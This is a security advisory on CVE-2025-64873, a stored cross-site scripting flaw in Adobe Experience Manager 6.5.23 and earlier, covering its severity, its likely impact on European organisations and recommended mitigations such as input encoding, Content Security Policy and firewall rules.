CVE-2025-64873 is a stored Cross-Site Scripting (XSS) vulnerability identified in Adobe Experience Manager (AEM) versions 6.5.23 and earlier. This vulnerability arises from insufficient sanitization of user-supplied input in form fields, allowing an attacker with low privileges to inject malicious JavaScript code that is stored persistently on the server. When other users visit the affected pages containing these injected scripts, the malicious code executes in their browsers under the context of the vulnerable site. This can lead to theft of session cookies, user impersonation, or unauthorized actions performed on behalf of the victim. The vulnerability requires the attacker to submit crafted input through vulnerable forms, thus involving user interaction, but does not require elevated privileges beyond low-level access. The CVSS 3.1 score of 5.4 reflects a medium severity, with the vector indicating network attack vector, low attack complexity, low privileges required, user interaction needed, and a scope change affecting confidentiality and integrity but not availability. No known exploits have been reported in the wild, and no official patches have been released yet. Adobe Experience Manager is widely used by enterprises for managing digital content and websites, making this vulnerability significant for organizations relying on AEM for public-facing or internal portals. Exploitation could lead to data leakage, session hijacking, or defacement, impacting user trust and compliance with data protection regulations.

For European organizations, the impact of this vulnerability can be substantial, particularly for those using Adobe Experience Manager to manage customer-facing websites or internal portals. Exploitation could result in unauthorized access to user sessions, theft of sensitive information, and potential manipulation of website content. This could lead to reputational damage, loss of customer trust, and regulatory penalties under GDPR if personal data is compromised. The vulnerability's medium severity indicates that while it does not directly affect system availability, the confidentiality and integrity of user data and interactions are at risk. Organizations in sectors such as finance, healthcare, government, and e-commerce, which often use AEM for digital services, may face increased risk. Additionally, the stored nature of the XSS means that malicious scripts persist and can affect multiple users over time, amplifying potential damage. The lack of a patch at disclosure increases the window of exposure, emphasizing the need for immediate mitigation.

To mitigate this vulnerability, organizations should implement strict input validation and output encoding on all user-supplied data in Adobe Experience Manager forms to prevent malicious script injection. Deploying a robust Content Security Policy (CSP) can help restrict the execution of unauthorized scripts in browsers. Monitoring web application logs for unusual input patterns or script injections can aid in early detection. Until an official patch is released, consider disabling or restricting vulnerable form functionalities if feasible. Employ web application firewalls (WAFs) with rules tailored to detect and block XSS payloads targeting AEM. Educate developers and administrators on secure coding practices specific to AEM and XSS prevention. Regularly review and update security configurations and conduct penetration testing focused on XSS vulnerabilities. Finally, prepare to apply Adobe’s official patches promptly once available to fully remediate the issue.